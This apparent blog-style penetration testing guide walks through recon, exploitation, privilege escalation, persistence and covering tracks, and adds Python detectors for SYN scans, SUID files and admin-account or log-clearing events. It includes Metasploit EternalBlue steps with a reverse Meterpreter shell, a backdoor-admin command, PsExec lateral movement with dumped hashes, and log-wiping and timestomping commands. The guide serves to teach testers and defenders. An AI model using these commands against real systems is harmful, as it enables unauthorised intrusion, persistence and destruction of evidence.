The Red Team Playbook: From Reconnaissance to Root – A Professional Penetration Testing Guide

Introduction:

Penetration testing, often called ethical hacking, is a systematic process of probing for and exploiting vulnerabilities in a controlled environment to strengthen an organization’s security posture. As Muhammad Fazriansyah’s recent project exemplifies, this practice is critical for identifying weaknesses before malicious actors can. This guide will walk through the core phases of a professional penetration test, providing the technical commands and methodologies used by red teamers worldwide.

Learning Objectives:

  • Understand and execute the key phases of a penetration test, from initial reconnaissance to post-exploitation.
  • Utilize essential tools for scanning, vulnerability assessment, and exploitation on both Linux and Windows platforms.
  • Learn fundamental techniques for maintaining access and covering tracks, and how to defend against them.

You Should Know:

1. The Art of Passive and Active Reconnaissance

Before any attack can be launched, a penetration tester must gather intelligence. This phase involves collecting public information without directly interacting with the target (passive) and then actively probing the target’s systems to map out the attack surface.

Passive Reconnaissance (OSINT): Use tools like `theHarvester` to gather emails, subdomains, and IP addresses from public sources.

Command: `theHarvester -d target-company.com -b google,linkedin`

Active Reconnaissance (Network Scanning): Use `Nmap` to discover live hosts, open ports, and running services. This is the first direct interaction with the target network.
Basic Scan: `nmap -sS -A -T4 target-ip` (This performs a SYN scan, OS/version detection, and script scanning).
UDP Scan: `nmap -sU -p 53,123,161 target-ip` (Scans for open UDP ports, which are often overlooked).
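A defender-side counterpart to the SYN scan above, added here as an example (not from the original post): a small Python detector that reads iptables `-j LOG` lines and flags any source that sends bare SYNs to many distinct ports within a short window, which is the footprint an `nmap -sS` sweep leaves on a logging gateway. The log lines are constructed; their layout follows the kernel LOG target's format.

```python
import re
from collections import defaultdict
from datetime import datetime

# Fields pulled from an iptables LOG line: syslog timestamp, SRC, TCP DPT, and a
# bare SYN (the LOG target prints ACK before SYN, so "RES=... SYN URGP" excludes SYN-ACK).
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) .*?SRC=(?P<src>\S+) .*?"
    r"PROTO=TCP .*?DPT=(?P<dpt>\d+) .*?RES=\S+ SYN URGP"
)

def parse_line(line):
    """Return (timestamp, src, dport) for a bare-SYN TCP log line, else None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    return datetime.strptime(m["ts"], "%b %d %H:%M:%S"), m["src"], int(m["dpt"])

def detect_scanners(lines, min_ports=10, window_s=60):
    """Return {src: all_ports_touched} for each source that probed at least
    `min_ports` distinct destination ports inside some `window_s`-second span."""
    events = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ts, src, dpt = parsed
            events[src].append((ts, dpt))
    hits = {}
    for src, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # Advance the window start until the span fits inside window_s.
            while (evs[end][0] - evs[start][0]).total_seconds() > window_s:
                start += 1
            if len({p for _, p in evs[start:end + 1]}) >= min_ports:
                hits[src] = sorted({p for _, p in evs})
                break
    return hits

def _line(ts, src, dpt):
    # Constructed iptables LOG line in the shape a "-j LOG" rule emits.
    return (f"{ts} gw kernel: IN=eth0 OUT= SRC={src} DST=10.0.0.5 LEN=44 "
            f"TTL=54 ID=1 DF PROTO=TCP SPT=54321 DPT={dpt} WINDOW=1024 "
            f"RES=0x00 SYN URGP=0")

# Constructed sample: one host sweeping 12 ports in 11 seconds, one normal client.
SAMPLE_LOG = [_line(f"Mar 10 12:00:{i:02d}", "203.0.113.7", 20 + i) for i in range(12)]
SAMPLE_LOG += [_line("Mar 10 12:00:05", "10.0.0.9", 443),
               _line("Mar 10 12:30:00", "10.0.0.9", 22)]
```

Tune `min_ports` and `window_s` to the gateway's normal traffic; a single threshold will not suit both a DMZ and an internal segment.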

2. Vulnerability Analysis and Scanning

Once you have a list of active hosts and services, the next step is to identify known vulnerabilities. Automated scanners can quickly surface common issues, but manual analysis is required for complex flaws.

Automated Scanning: Tools like `Nessus` or `OpenVAS` provide comprehensive vulnerability assessments. They cross-reference the discovered services with massive databases of known vulnerabilities (CVEs).
While these are largely GUI-based, you can run OpenVAS from the command line to start a scan: `omp -u username -w password --target="Target Name" --config="Full and fast"`
Manual Analysis: For web applications, use `Burp Suite` or `OWASP ZAP` to intercept requests, fuzz parameters, and test for vulnerabilities like SQL Injection and Cross-Site Scripting (XSS). This involves manually manipulating HTTP requests to observe unexpected behavior.

3. Gaining Initial Foothold: Exploitation

This is the phase where identified vulnerabilities are actively exploited to gain unauthorized access to a system. This could be through a web application flaw, a network service exploit, or a social engineering campaign.

Metasploit Framework: This is the quintessential exploitation tool. It provides a vast collection of exploit modules and payloads.
Steps to exploit a known SMB vulnerability on a Windows host:

1. `msfconsole` (Launch Metasploit)

2. `search eternalblue` (Search for the exploit)

3. `use exploit/windows/smb/ms17_010_eternalblue`

4. `set RHOSTS target-ip`

5. `set PAYLOAD windows/x64/meterpreter/reverse_tcp`

6. `set LHOST your-ip`

7. `exploit`

Standalone Exploits: Sometimes, you may need to run a public Proof-of-Concept (PoC) exploit written in Python or C.

Example: `python3 exploit.py -t target-ip -p 80`

4. Post-Exploitation and Privilege Escalation

Gaining a shell is often just the beginning. The next goal is to increase privileges from a standard user to a system or root administrator and then gather valuable data.

Windows Privilege Escalation:

Information Gathering: Use Meterpreter’s `getsystem` (which attempts automatic elevation) or run Windows commands via a shell to enumerate the host.

`whoami /priv` (View current user privileges)

`systeminfo` (Get detailed system information)

Automated Scripts: Run tools like `WinPEAS` or `PowerSploit` to automatically find common misconfigurations.

Linux Privilege Escalation:

SUID Binaries: Find binaries with the SUID bit set, which may be exploitable if they are misconfigured or vulnerable.

`find / -perm -u=s -type f 2>/dev/null`

Kernel Exploits: Use scripts like `Linux Exploit Suggester` to find suitable kernel exploits for the target system.
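From the defender's side, the same `find` output is only useful with an approved baseline to compare against. The following Python is an added example (not from the original post) that enumerates SUID files and reports anything not on the baseline, plus baseline entries that have gone missing; the baseline contents are constructed and the paths are assumptions for an illustrative host.

```python
import os
import stat

def list_suid(root="/"):
    """Return the set of regular files under `root` with the SUID bit set:
    the same data as `find / -perm -u=s -type f 2>/dev/null`, from Python."""
    found = set()
    for dirpath, _, files in os.walk(root, onerror=lambda err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(path)
    return found

def load_baseline(text):
    """Parse an approved-SUID list: one path per line, '#' starts a comment."""
    paths = set()
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            paths.add(line)
    return paths

def diff_suid(current, baseline):
    """Return (unexpected, missing): SUID files absent from the baseline, and
    baseline entries that no longer carry the bit or no longer exist."""
    return sorted(current - baseline), sorted(baseline - current)

# Constructed baseline for a minimal Debian-like host (illustrative only).
BASELINE_TEXT = """
# approved SUID binaries
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/su
"""

if __name__ == "__main__":
    unexpected, missing = diff_suid(list_suid("/"), load_baseline(BASELINE_TEXT))
    for p in unexpected:
        print("UNEXPECTED SUID:", p)
    for p in missing:
        print("missing from host:", p)
```

Run it from a scheduled job and alert on any non-empty `unexpected` list; a new SUID file under `/tmp`, `/dev/shm` or a home directory is almost never legitimate.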

5. Maintaining Persistence and Lateral Movement

To simulate an advanced attacker, a penetration tester must maintain access and move laterally across the network to access critical systems.

Persistence on Windows: Add a user or schedule a task to call back at regular intervals.
Add user: `net user backdooruser P@ssw0rd! /add && net localgroup administrators backdooruser /add`
Metasploit: Use the `persistence` module within a Meterpreter session.
Lateral Movement: Use credentials dumped from the initial system to access other machines via PsExec or WMI.
Metasploit PsExec: `use exploit/windows/smb/psexec` and set the `SMBUser` and `SMBPass` to the dumped hashes/passwords.

6. Covering Tracks (For Awareness and Defense)

A professional pentest includes demonstrating how an attacker can hide their activity. Understanding this is crucial for building effective defenses and detection mechanisms.

Clearing Logs: On both Windows and Linux, attackers will attempt to clear event logs.

Windows (via Meterpreter): `clearev`

Linux: `history -c && history -w` (Clear command history) and then manually remove entries from `/var/log/` files like `auth.log` and syslog.
Timestomping: Attackers may alter the timestamps of files they create or modify to blend in. In Meterpreter, this can be done with the `timestomp` command.
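The persistence commands in section 5 and the log clearing in this section each leave a distinct trace in the Windows Security log, and that is where a blue team should look for them. The following Python is an added example (not from the original post) that correlates an account creation (event 4720) with a follow-on addition to Administrators (4732) and lists every audit-log clear (1102); the events and their field names are constructed for this example, not a real EVTX parse.

```python
from datetime import datetime

# Constructed Security-log events reduced to the fields this check uses
# (the key names are this example's own, not Windows' XML element names):
#   4720 = user account created, 4732 = member added to a local group,
#   1102 = the audit log was cleared (clearev also produces 104 in System).
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:00", "id": 4624, "subject": "alice", "target": "alice"},
    {"time": "2024-05-01T10:05:10", "id": 4720, "subject": "alice", "target": "backdooruser"},
    {"time": "2024-05-01T10:05:11", "id": 4732, "subject": "alice",
     "target": "backdooruser", "group": "Administrators"},
    {"time": "2024-05-01T10:40:00", "id": 1102, "subject": "alice"},
]

def detect_admin_backdoor(events, window_s=300):
    """Return [(account, creator)] for accounts created (4720) and then added
    to the local Administrators group (4732) within `window_s` seconds."""
    created, alerts = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4720:
            created[ev["target"]] = t
        elif ev["id"] == 4732 and ev.get("group", "").lower() == "administrators":
            t0 = created.get(ev["target"])
            if t0 is not None and (t - t0).total_seconds() <= window_s:
                alerts.append((ev["target"], ev["subject"]))
    return alerts

def detect_log_clearing(events):
    """Return [(time, who)] for every 1102 event. Clearing the Security log
    cannot be done silently: 1102 is the first event written to the new log."""
    return [(ev["time"], ev["subject"]) for ev in events if ev["id"] == 1102]

if __name__ == "__main__":
    for account, creator in detect_admin_backdoor(SAMPLE_EVENTS):
        print(f"new local admin {account!r} created by {creator}")
    for when, who in detect_log_clearing(SAMPLE_EVENTS):
        print(f"Security log cleared at {when} by {who}")
```

Forwarding the Security log to a central collector before anything is cleared is what makes the 1102 check useful; a log that only exists on the compromised host is gone by the time you read it.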

What Undercode Says:

  • A successful penetration test is 20% tools and 80% methodology and critical thinking. The tools are enablers, but the value comes from the tester’s ability to chain vulnerabilities and think like an advanced adversary.
  • The ultimate goal is not just to “get root,” but to provide a clear, actionable roadmap for the client to improve their defensive posture, prioritizing risks based on business impact.

The landscape depicted in this guide underscores a fundamental shift in cybersecurity: reactive defense is no longer sufficient. Organizations must proactively assume breach and test their defenses continuously. The technical steps—from leveraging EternalBlue to clearing logs—are not just academic; they are the literal playbook of modern ransomware groups and state-sponsored actors. By understanding and replicating these tactics, red teams provide the only true measure of an organization’s resilience. The increasing demand for skilled professionals like Muhammad Fazriansyah is a direct market response to this escalating threat.

Prediction:

The increasing sophistication of automated penetration testing tools integrated with AI will democratize offensive security, allowing smaller teams to conduct more thorough assessments. However, this will be a double-edged sword, as the same AI-powered tools will be weaponized by malicious actors to find and exploit vulnerabilities at an unprecedented scale and speed. The future of cybersecurity will be an AI-augmented arms race between red and blue teams, making continuous, intelligent testing not just a best practice, but a core requirement for organizational survival.

Reported By: Fazriansyahmuh Pentest – Hackers Feeds